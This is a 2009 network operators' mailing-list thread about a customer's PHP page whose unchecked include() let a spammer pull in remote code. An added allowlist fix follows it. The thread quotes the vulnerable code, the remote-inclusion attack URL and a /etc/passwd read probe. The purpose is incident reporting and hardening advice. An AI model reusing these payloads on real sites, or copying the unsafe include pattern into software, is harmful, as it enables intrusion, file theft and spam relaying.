Luckily in this case: it's a Windows server...
--
Mike Kellenberger mike.kellenberger@escapenet.ch
Escapenet - the Web Company Tel +41 52 235 0700
http://www.escapenet.ch Skype mikek70atwork
-----Original Message-----
From: swinog-bounces@lists.swinog.ch [mailto:swinog-bounces@lists.swinog.ch] On Behalf Of Gianni Carafa
Sent: Thursday, 19 February 2009 17:04
To: swinog@swinog.ch
Subject: Re: [swinog] F*ing Spammers and stupid customer code...
That's bad coding anyway:
http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd
Regards Gianni
Radek Mrskos wrote:
> I think this is what you should have anyway in your php.ini
>
>
> allow_url_fopen = Off
>
> /Radek
> On 19.02.2009 at 16:31, Mike Kellenberger wrote:
>
>
>> Hi all
>>
>> Just stopped our mail server from spitting out thousands of spam
>> messages.
>>
>> We have a customer who has a site with the following (stupid) code in
>> his index.php:
>>
>> if($called_page_link!="")
>> {
>> $requested_file=$called_page_link;
>> }
>>
>> include($requested_file);
>>
>>
>> The f*ing spammer found out about this and called the page with:
>>
>>
>> http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocities.com/nimiuu/fuck.txt?
>>
>>
>> Boom.
>>
>> Have I already told you that I hate spammers? :-)
>>
>> Oh well, one down - a few million to go...
>>
>>
>> Regards,
>>
>> Mike
>>
>> _______________________________________________
>> swinog mailing list
>> swinog@lists.swinog.ch
>> http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
>>
>
> Kind regards
>
> Radek Mrskos Email: mrskos@volume.ch
> Baechlerstr. 12 Tel: +41 43 534 40 24
> CH-8802 Kilchberg Mob: +41 79 219 68 66
> PGP:0x8CB69F6D Fax: +41 86079 2196 866
>
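
An allowlist version of the index.php include discussed in this thread, as an added example that is not code from the original posts: the request parameter only selects a key from a fixed table and never supplies a path, so neither the remote URL nor the /etc/passwd request reaches include. The page keys, file names and the pages directory are hypothetical, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example: allowlist replacement for include($called_page_link).
// Page keys, file names and the pages/ directory are hypothetical.

const PAGE_DIR = __DIR__ . '/pages';

// Only these keys can ever reach include(); the request never supplies a path.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'about'   => 'about.php',
];

/**
 * Map a request parameter to a file inside PAGE_DIR, or return null.
 */
function resolve_page($requested): ?string
{
    // Reject arrays (?called_page_link[]=x) and any key not in the table.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must still live under PAGE_DIR
    // (catches a symlink or a bad entry in the table).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly instead of relying on register_globals.
$key  = $_GET['called_page_link'] ?? 'home';
$file = resolve_page($key);

if ($file === null) {
    http_response_code(404);
    // Log an encoded, truncated copy so the value cannot forge log lines.
    $shown = is_string($key) ? rawurlencode(substr($key, 0, 200)) : gettype($key);
    error_log('rejected called_page_link: ' . $shown);
    exit('Page not found');
}
include $file;
```

The rejected values in the error log are also a cheap detection signal: a called_page_link containing a scheme or a path separator is a probe, not a mistyped page name.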